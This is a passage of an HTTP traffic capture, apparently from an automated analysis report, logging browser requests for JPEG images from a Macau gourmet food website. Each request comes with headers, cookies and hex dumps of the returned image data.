                                                                                                                                                              Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 64 00 64 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 02 02 02 02 02 02 02 02 02 02 03 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0f 0f 0c 0c 0c 0c 0c 0c 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 00 16 00 6b 03 01 11 00 02 11 01 03 11 01 ff c4 00 9b 00 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 00 04 05 06 07 08 09 01 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 00 03 01 02 04 06 05 10 00 01 04 01 03 04 00 04 04 04 07 00 00 00 00 00 02 01 03 04 05 06 00 11 12 21 13 14 07 31 22 15 16 32 62 23 24 41 51 a1 36 52 53 d3 34 64 17 27 11 00 02 01 03 02 04 02 07 05 06 07 00 00 00 00 00 01 02 11 00 12 03 21 04 31 22 13 05 41 51 f0 61 71 91 a1 b1 32 52 62 23 14 06 81 c1 f1 42 72 33 82 d2 a3 34 15 25 16 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 f7 f3 45 14 68 a2 8d 14 51 a2 8a 34 51 4a 31 3e 04 99 33 61 46 9a c4 89 95 a4 01 63 11 b7 04 dd 8e 4e 82 38 da 3a 08 aa a0 a4 0a 84 9c 91 37 4e bf 0d 29 33 63 76 64 56 05 96 2e 00 ea b2 24 48 f0 91 a8 9f 0a 80 41 a6 f4 da 9a 34 51 46 8a 29 39 d6 10 2b 18 49 36 53 a3 d7 c6 27 1b 64 64 49 74 1a 05 71 e3 46 db 0e 46 a8 9c 8c 89 04 53 e2 aa bb 26 95 9b 3e 3c 2b 76 46 0a 24 09 24 01 24 c0 1a f8 93 a0 f3 35 04 81 c6 9c d3 6a 68 d1 45 1a 28 a3 45 15 cf 3e b5 c6 31 df 63 63 96 19 86 6d 4f 1b 24 bd bd b5 b5 6c 8e c4 3b e5 5c cc 69 8f 46 66 34 3e 6a ab 19 00 1b 45 dd be 25 c9 79 2a ef b2 eb 88 ec 3d bf 6f dd b6 cd ba dd a0 c9 91 dd c7 30 9b 02 b1 55 54 9f a2 00 9e 58 33 ac cd 65 c2 8b 91 6e 61 24 93 fb 2a 2f d7 39 d5 fc 36 b0 1c 55 d7 c2 da 1c ec a7 24 c7 5c b6 98 ae 3d 28 e1 53 b7 21 d8 a6 2e 77 11 14 bf 4c 41 54 90 b7 14 fe 7d 75 9b b1 77 8d c6 31 b7 db 13 7a b6 6c d8 ee 69 2c 53 10 62 86 67 8e 80 12 67 4f 5e b5 18 b2 11 6a fa c8 f7 54 f6 43 ed 2c 92 aa 1f b6 1f 85 5d 5f 29 fc 12 ea 9a ba 92 3b 82 e8 a3 e1 62 b0 d1 c4 7c bb 9f 8b f7 04 82 42 88 89 d3 74 2e bb ed de fe a2 dc e0 4d e3 22 a9 38 32 63 55 1a f3 0c 96 4d da f1 e6 30 44 46 92 0d 59 f3 30 0d 1e 04 7c 62 b6 1a a4 bf 8d 58 67 90 c8 83 63 68 3c 9c e3 57 19 d8 cc a0 f1 45 46 84 5d 7d f2 35 45 dd 39 ee 3c ba 7c 83 ae a3 6d f9 84 c5 39 ca b3 f1 e4 05 47 b3 56 62 7d ba 4f d9 14 f5 98 d6 b1 4f 57 61 f8 e6 79 83 55 e6 b9 85 63 39 0e 53 95 a3 b3 67 de c8 df ca 8e aa fb 88 db 10 df 15 17 23 03 22 88 08 8d 10 fc 35 c9 fe 9e ed 7b 6e e7 b1 4d de e9 06 4c d9 65 8b 9f a9 75 30 a8 dc 50 28 d0 05 22 b3 e1 c6 ae 81 9b 52 69 44 99 98 d7 66 fe f6 b0 c6 0a a1 a6 6a 16 b2 6c 8f a9 b4 fc 92 92 6c d3 32 63 1c 05 a7 98 ed 22 a0 ae ee 91 1e ca a9 fa 6b f1 d2 ba bb cc 5b ee e0 fb 7b 00 4b 18 de 0b 5c 46 25 36 88 2b 6f f5 12 df d3 51 2c 1d ca c7 87 ca ad 71 fd 81 90 65 56 b8 a5 26 28 cd 7d 34 8b cc 4e 36 5d 69 63 6a cb b3 82 3c 79 84 20 c4 76 98 61 f8 aa e1 a9 f2 e4 4a e0 a2 22 7c 15 57 6d 7a 49 de b7 1b
                                                                                                                                                              Data Ascii: JFIFddDuckyPAdobedk!1"2b#$AQ6RS4d'!1"AQaq2Rb#Br34%?EhQ4QJ1>3aFcN8:7N)3cvdV.$HA4QF)9+I6S'ddItqFFS&><+vF$$$5jhE(E>1ccmO$l;\iFf4>jE%y*=o0UTX3ena$*/96U$\=(S!.wLAT}uw1zli,SbggO^jTC,]_);b|Bt.M"82cUM0DFY0|bXgch<WEF]}5E9<|m9GVb}OOWayUc9Sg#"5{nMLeu0P("RiDfjll2c"k[{K\F%6+oQ,qeV&(}4N6]icj<y vaJ"|WmzI
                                                                                                                                                              Mar 13, 2023 05:27:04.575319052 CET3317OUTGET /images/title_chocology.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
                                                                                                                                                              Mar 13, 2023 05:27:04.780028105 CET3350INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 2612
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:27 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "3c65aff9a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:27:10 GMT
                                                                                                                                                              Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 64 00 64 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 02 02 02 02 02 02 02 02 02 02 03 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0f 0f 0c 0c 0c 0c 0c 0c 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 00 16 00 6b 03 01 11 00 02 11 01 03 11 01 ff c4 00 9b 00 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 00 04 05 06 07 08 09 01 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 00 03 01 02 04 06 05 10 00 01 04 01 03 04 00 04 04 04 07 00 00 00 00 00 02 01 03 04 05 06 00 11 12 21 13 14 07 31 22 15 16 32 62 23 24 41 51 a1 36 52 53 d3 34 64 17 27 11 00 02 01 03 02 04 02 07 05 06 07 00 00 00 00 00 01 02 11 00 12 03 21 04 31 22 13 05 41 51 f0 61 71 91 a1 b1 32 52 62 23 14 06 81 c1 f1 42 72 33 82 d2 a3 34 15 25 16 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 f7 f3 45 14 68 a2 8d 14 51 a2 8a 34 51 4a 31 3e 04 99 33 61 46 9a c4 89 95 a4 01 63 11 b7 04 dd 8e 4e 82 38 da 3a 08 aa a0 a4 0a 84 9c 91 37 4e bf 0d 29 33 63 76 64 56 05 96 2e 00 ea b2 24 48 f0 91 a8 9f 0a 80 41 a6 f4 da 9a 34 51 46 8a 29 39 d6 10 2b 18 49 36 53 a3 d7 c6 27 1b 64 64 49 74 1a 05 71 e3 46 db 0e 46 a8 9c 8c 89 04 53 e2 aa bb 26 95 9b 3e 3c 2b 76 46 0a 24 09 24 01 24 c0 1a f8 93 a0 f3 35 04 81 c6 9c d3 6a 68 d1 45 1a 28 a3 45 15 cf 3e b5 c6 31 df 63 63 96 19 86 6d 4f 1b 24 bd bd b5 b5 6c 8e c4 3b e5 5c cc 69 8f 46 66 34 3e 6a ab 19 00 1b 45 dd be 25 c9 79 2a ef b2 eb 88 ec 3d bf 6f dd b6 cd ba dd a0 c9 91 dd c7 30 9b 02 b1 55 54 9f a2 00 9e 58 33 ac cd 65 c2 8b 91 6e 61 24 93 fb 2a 2f d7 39 d5 fc 36 b0 1c 55 d7 c2 da 1c ec a7 24 c7 5c b6 98 ae 3d 28 e1 53 b7 21 d8 a6 2e 77 11 14 bf 4c 41 54 90 b7 14 fe 7d 75 9b b1 77 8d c6 31 b7 db 13 7a b6 6c d8 ee 69 2c 53 10 62 86 67 8e 80 12 67 4f 5e b5 18 b2 11 6a fa c8 f7 54 f6 43 ed 2c 92 aa 1f b6 1f 85 5d 5f 29 fc 12 ea 9a ba 92 3b 82 e8 a3 e1 62 b0 d1 c4 7c bb 9f 8b f7 04 82 42 88 89 d3 74 2e bb ed de fe a2 dc e0 4d e3 22 a9 38 32 63 55 1a f3 0c 96 4d da f1 e6 30 44 46 92 0d 59 f3 30 0d 1e 04 7c 62 b6 1a a4 bf 8d 58 67 90 c8 83 63 68 3c 9c e3 57 19 d8 cc a0 f1 45 46 84 5d 7d f2 35 45 dd 39 ee 3c ba 7c 83 ae a3 6d f9 84 c5 39 ca b3 f1 e4 05 47 b3 56 62 7d ba 4f d9 14 f5 98 d6 b1 4f 57 61 f8 e6 79 83 55 e6 b9 85 63 39 0e 53 95 a3 b3 67 de c8 df ca 8e aa fb 88 db 10 df 15 17 23 03 22 88 08 8d 10 fc 35 c9 fe 9e ed 7b 6e e7 b1 4d de e9 06 4c d9 65 8b 9f a9 75 30 a8 dc 50 28 d0 05 22 b3 e1 c6 ae 81 9b 52 69 44 99 98 d7 66 fe f6 b0 c6 0a a1 a6 6a 16 b2 6c 8f a9 b4 fc 92 92 6c d3 32 63 1c 05 a7 98 ed 22 a0 ae ee 91 1e ca a9 fa 6b f1 d2 ba bb cc 5b ee e0 fb 7b 00 4b 18 de 0b 5c 46 25 36 88 2b 6f f5 12 df d3 51 2c 1d ca c7 87 ca ad 71 fd 81 90 65 56 b8 a5 26 28 cd 7d 34 8b cc 4e 36 5d 69 63 6a cb b3 82 3c 79 84 20 c4 76 98 61 f8 aa e1 a9 f2 e4 4a e0 a2 22 7c 15 57 6d 7a 49 de b7 1b
                                                                                                                                                              Data Ascii: JFIFddDuckyPAdobedk!1"2b#$AQ6RS4d'!1"AQaq2Rb#Br34%?EhQ4QJ1>3aFcN8:7N)3cvdV.$HA4QF)9+I6S'ddItqFFS&><+vF$$$5jhE(E>1ccmO$l;\iFf4>jE%y*=o0UTX3ena$*/96U$\=(S!.wLAT}uw1zli,SbggO^jTC,]_);b|Bt.M"82cUM0DFY0|bXgch<WEF]}5E9<|m9GVb}OOWayUc9Sg#"5{nMLeu0P("RiDfjll2c"k[{K\F%6+oQ,qeV&(}4N6]icj<y vaJ"|WmzI
                                                                                                                                                              Mar 13, 2023 05:27:22.221452951 CET3450OUTGET /uploadfiles/SRL_2_1_3750997.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/OurProducts.asp
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
                                                                                                                                                              Mar 13, 2023 05:27:22.443922043 CET3467INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 153460
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:24:26 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "60ab993aa8b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:27:27 GMT
                                                                                                                                                              Data Raw: ff d8 ff e1 27 61 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 0e 00 00 01 03 00 01 00 00 00 f0 15 00 00 01 01 03 00 01 00 00 00 a0 0e 00 00 02 01 03 00 03 00 00 00 b6 00 00 00 06 01 03 00 01 00 00 00 02 00 00 00 0f 01 02 00 06 00 00 00 bc 00 00 00 10 01 02 00 15 00 00 00 c2 00 00 00 12 01 03 00 01 00 00 00 01 00 00 00 15 01 03 00 01 00 00 00 03 00 00 00 1a 01 05 00 01 00 00 00 d7 00 00 00 1b 01 05 00 01 00 00 00 df 00 00 00 28 01 03 00 01 00 00 00 02 00 00 00 31 01 02 00 1e 00 00 00 e7 00 00 00 32 01 02 00 14 00 00 00 05 01 00 00 69 87 04 00 01 00 00 00 1c 01 00 00 38 03 00 00 08 00 08 00 08 00 43 61 6e 6f 6e 00 43 61 6e 6f 6e 20 45 4f 53 20 35 44 20 4d 61 72 6b 20 49 49 00 00 9f 24 00 10 27 00 00 00 9f 24 00 10 27 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 53 36 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 30 3a 30 36 3a 32 32 20 31 30 3a 30 38 3a 31 39 00 00 00 00 1e 00 9a 82 05 00 01 00 00 00 8a 02 00 00 9d 82 05 00 01 00 00 00 92 02 00 00 22 88 03 00 01 00 00 00 01 00 00 00 27 88 03 00 01 00 00 00 64 00 00 00 00 90 07 00 04 00 00 00 30 32 32 31 03 90 02 00 14 00 00 00 9a 02 00 00 04 90 02 00 14 00 00 00 ae 02 00 00 01 92 0a 00 01 00 00 00 c2 02 00 00 02 92 05 00 01 00 00 00 ca 02 00 00 04 92 0a 00 01 00 00 00 d2 02 00 00 05 92 05 00 01 00 00 00 da 02 00 00 07 92 03 00 01 00 00 00 05 00 00 00 09 92 03 00 01 00 00 00 10 00 00 00 0a 92 05 00 01 00 00 00 e2 02 00 00 90 92 02 00 03 00 00 00 33 30 00 00 91 92 02 00 03 00 00 00 33 30 00 00 92 92 02 00 03 00 00 00 33 30 00 00 01 a0 03 00 01 00 00 00 ff ff 00 00 02 a0 04 00 01 00 00 00 f4 01 00 00 03 a0 04 00 01 00 00 00 4e 01 00 00 0e a2 05 00 01 00 00 00 ea 02 00 00 0f a2 05 00 01 00 00 00 f2 02 00 00 10 a2 03 00 01 00 00 00 02 00 00 00 01 a4 03 00 01 00 00 00 00 00 00 00 02 a4 03 00 01 00 00 00 01 00 00 00 03 a4 03 00 01 00 00 00 01 00 00 00 06 a4 03 00 01 00 00 00 00 00 00 00 31 a4 02 00 0a 00 00 00 fa 02 00 00 32 a4 05 00 04 00 00 00 04 03 00 00 34 a4 02 00 14 00 00 00 24 03 00 00 00 00 00 00 01 00 00 00 01 00 00 00 04 00 00 00 01 00 00 00 32 30 31 33 3a 31 31 3a 30 38 20 31 33 3a 30 36 3a 33 34 00 32 30 31 33 3a 31 31 3a 30 38 20 31 33 3a 30 36 3a 33 34 00 00 00 00 00 01 00 00 00 04 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 03 00 00 00 01 00 00 00 64 00 00 00 01 00 00 00 80 b1 55 00 b3 05 00 00 00 21 39 00 be 03 00 00 39 33 30 36 31 31 30 36 37 00 64 00 00 00 01 00 00 00 64 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 45 46 31 30 30 6d 6d 20 66 2f 32 2e 38 20 4d 61 63 72 6f 00 06 00 03 01 03 00 01 00 00 00 06 00 00 00 1a 01 05 00 01 00 00 00 86 03 00 00 1b 01 05 00 01 00 00 00 8e 03 00 00 28 01 03 00 01 00 00 00 02 00 00 00 01 02 04 00 01 00 00 00 96 03 00 00 02 02 04 00 01 00 00 00 c3 23 00 00 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 00 00 00 ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48
                                                                                                                                                              Data Ascii: 'aExifII*(12i8CanonCanon EOS 5D Mark II$'$'Adobe Photoshop CS6 (Windows)2020:06:22 10:08:19"'d0221303030N124$2013:11:08 13:06:342013:11:08 13:06:34dU!9930611067ddEF100mm f/2.8 Macro(#HHXICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-H
                                                                                                                                                              Mar 13, 2023 05:27:30.689323902 CET4558OUTGET /SysImages/Prev.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/OurProducts.asp
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
                                                                                                                                                              Mar 13, 2023 05:27:30.893763065 CET4561INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 513
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:23:37 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "d2b55d1da8b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:27:36 GMT
                                                                                                                                                              Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 64 00 64 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 02 02 02 02 02 02 02 02 02 02 03 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0f 0f 0c 0c 0c 0c 0c 0c 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 00 0b 00 0a 03 01 11 00 02 11 01 03 11 01 ff c4 00 81 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 09 01 00 03 01 01 00 00 00 00 00 00 00 00 00 00 00 00 01 03 04 05 06 10 00 00 02 07 05 06 07 00 00 00 00 00 00 00 00 00 01 03 11 02 12 13 04 05 06 00 33 14 15 07 21 31 51 22 64 36 32 62 53 a3 d3 24 54 11 00 01 01 04 05 0d 01 00 00 00 00 00 00 00 00 00 01 11 00 02 12 03 f0 31 51 61 71 21 41 81 b1 c1 d1 f1 22 52 a2 13 33 04 05 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 a8 da 81 54 44 50 d2 ad 28 19 46 9d 93 51 a9 5a d4 d4 fc 82 7f 51 ae 41 4b c2 4a 61 a6 51 50 e4 19 11 12 0a 88 1c 2b 9c f0 4b 25 64 3b 03 04 04 c5 d2 c1 47 72 9f a1 f7 4e 93 31 1d 52 0b e9 5e 40 09 4e 19 b5 15 ce 98 5c 85 02 a9 03 0a 52 f4 d8 08 1f c6 47 76 e1 6e d5 b8 f4 b7 78 3c bb ad b1 e4 7a d3 eb 5d 36 e2 cd 64 b2 9c d7 2b 96 bb ce 9d e1 4a 61 d6 56 ed 0c 02 18 79 ce 8e 0d 6d e3 69 67 41 1b cb 0d 67 af 63 16 21 f6 fa ee e6 e9 2f be 5f 6a d6 f2 dd eb be ad dd cc 1b ff d9
                                                                                                                                                              Data Ascii: JFIFddDuckyPAdobed3!1Q"d62bS$T1Qaq!A"R3?TDP(FQZQAKJaQP+K%d;GrN1R^@N\RGvnx<z]6d+JaVymigAgc!/_j
                                                                                                                                                              Mar 13, 2023 05:27:30.981427908 CET4613OUTGET /uploadfiles/SRL_2_1_3750997.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
                                                                                                                                                              Mar 13, 2023 05:27:31.188719988 CET4662INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 153460
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:24:26 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "60ab993aa8b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:27:37 GMT
                                                                                                                                                              Data Raw: ff d8 ff e1 27 61 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 0e 00 00 01 03 00 01 00 00 00 f0 15 00 00 01 01 03 00 01 00 00 00 a0 0e 00 00 02 01 03 00 03 00 00 00 b6 00 00 00 06 01 03 00 01 00 00 00 02 00 00 00 0f 01 02 00 06 00 00 00 bc 00 00 00 10 01 02 00 15 00 00 00 c2 00 00 00 12 01 03 00 01 00 00 00 01 00 00 00 15 01 03 00 01 00 00 00 03 00 00 00 1a 01 05 00 01 00 00 00 d7 00 00 00 1b 01 05 00 01 00 00 00 df 00 00 00 28 01 03 00 01 00 00 00 02 00 00 00 31 01 02 00 1e 00 00 00 e7 00 00 00 32 01 02 00 14 00 00 00 05 01 00 00 69 87 04 00 01 00 00 00 1c 01 00 00 38 03 00 00 08 00 08 00 08 00 43 61 6e 6f 6e 00 43 61 6e 6f 6e 20 45 4f 53 20 35 44 20 4d 61 72 6b 20 49 49 00 00 9f 24 00 10 27 00 00 00 9f 24 00 10 27 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 53 36 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 30 3a 30 36 3a 32 32 20 31 30 3a 30 38 3a 31 39 00 00 00 00 1e 00 9a 82 05 00 01 00 00 00 8a 02 00 00 9d 82 05 00 01 00 00 00 92 02 00 00 22 88 03 00 01 00 00 00 01 00 00 00 27 88 03 00 01 00 00 00 64 00 00 00 00 90 07 00 04 00 00 00 30 32 32 31 03 90 02 00 14 00 00 00 9a 02 00 00 04 90 02 00 14 00 00 00 ae 02 00 00 01 92 0a 00 01 00 00 00 c2 02 00 00 02 92 05 00 01 00 00 00 ca 02 00 00 04 92 0a 00 01 00 00 00 d2 02 00 00 05 92 05 00 01 00 00 00 da 02 00 00 07 92 03 00 01 00 00 00 05 00 00 00 09 92 03 00 01 00 00 00 10 00 00 00 0a 92 05 00 01 00 00 00 e2 02 00 00 90 92 02 00 03 00 00 00 33 30 00 00 91 92 02 00 03 00 00 00 33 30 00 00 92 92 02 00 03 00 00 00 33 30 00 00 01 a0 03 00 01 00 00 00 ff ff 00 00 02 a0 04 00 01 00 00 00 f4 01 00 00 03 a0 04 00 01 00 00 00 4e 01 00 00 0e a2 05 00 01 00 00 00 ea 02 00 00 0f a2 05 00 01 00 00 00 f2 02 00 00 10 a2 03 00 01 00 00 00 02 00 00 00 01 a4 03 00 01 00 00 00 00 00 00 00 02 a4 03 00 01 00 00 00 01 00 00 00 03 a4 03 00 01 00 00 00 01 00 00 00 06 a4 03 00 01 00 00 00 00 00 00 00 31 a4 02 00 0a 00 00 00 fa 02 00 00 32 a4 05 00 04 00 00 00 04 03 00 00 34 a4 02 00 14 00 00 00 24 03 00 00 00 00 00 00 01 00 00 00 01 00 00 00 04 00 00 00 01 00 00 00 32 30 31 33 3a 31 31 3a 30 38 20 31 33 3a 30 36 3a 33 34 00 32 30 31 33 3a 31 31 3a 30 38 20 31 33 3a 30 36 3a 33 34 00 00 00 00 00 01 00 00 00 04 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 03 00 00 00 01 00 00 00 64 00 00 00 01 00 00 00 80 b1 55 00 b3 05 00 00 00 21 39 00 be 03 00 00 39 33 30 36 31 31 30 36 37 00 64 00 00 00 01 00 00 00 64 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 45 46 31 30 30 6d 6d 20 66 2f 32 2e 38 20 4d 61 63 72 6f 00 06 00 03 01 03 00 01 00 00 00 06 00 00 00 1a 01 05 00 01 00 00 00 86 03 00 00 1b 01 05 00 01 00 00 00 8e 03 00 00 28 01 03 00 01 00 00 00 02 00 00 00 01 02 04 00 01 00 00 00 96 03 00 00 02 02 04 00 01 00 00 00 c3 23 00 00 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 00 00 00 ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48
                                                                                                                                                              Data Ascii: 'aExifII*(12i8CanonCanon EOS 5D Mark II$'$'Adobe Photoshop CS6 (Windows)2020:06:22 10:08:19"'d0221303030N124$2013:11:08 13:06:342013:11:08 13:06:34dU!9930611067ddEF100mm f/2.8 Macro(#HHXICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-H
                                                                                                                                                              Mar 13, 2023 05:27:43.787466049 CET5646OUTGET /SysImages/Last.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
                                                                                                                                                              Mar 13, 2023 05:27:43.992193937 CET5647INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 570
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:23:36 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "ca62e1da8b6d81:615ba"
